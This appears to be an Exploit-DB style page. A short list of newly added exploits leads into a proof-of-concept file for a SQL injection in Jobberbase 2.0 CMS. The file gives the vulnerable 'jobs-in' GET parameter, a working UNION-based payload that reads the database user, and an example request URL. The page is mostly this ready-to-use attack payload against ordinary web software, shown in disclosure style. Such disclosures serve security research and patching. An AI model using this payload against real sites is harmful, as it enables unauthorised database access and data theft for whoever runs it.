
8 changes to exploits/shellcodes BearFTP 0.1.0 - 'PASV' Denial of Service P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC) Jobberbase 2.0 CMS - 'jobs-in' SQL Injection IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting phpList 3.5.0 - Authentication Bypass Jira 8.3.4 - Information Disclosure (Username Enumeration) Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
19 lines
No EOL
630 B
Text
19 lines
No EOL
630 B
Text
# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 28, August 2019
|
|
# Exploit Author: Suvadip Kar
|
|
# Vendor Homepage: http://jobberbase.com/
|
|
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
|
|
# Version: 2.0
|
|
# Tested on: Linux
|
|
# CVE : N/A
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
#POC - SQLi
|
|
#Request: http://localhost/[PATH]/jobs/jobs-in/
|
|
#Vulnerable Parameter: jobs-in (GET)
|
|
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ
|
|
|
|
#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
|
|
33,user()-- XYZ |